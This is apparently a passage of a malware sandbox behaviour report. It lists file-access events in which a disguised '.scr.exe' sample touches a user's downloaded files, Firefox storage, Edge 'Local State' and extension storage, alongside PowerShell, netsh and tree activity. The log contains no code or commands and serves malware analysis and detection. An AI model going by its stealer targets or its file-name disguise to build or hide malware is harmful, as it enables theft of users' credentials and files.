Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\DUUDTUBZFW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\DUUDTUBZFW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\DUUDTUBZFW.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.pdf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EOWRVPQCCS.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
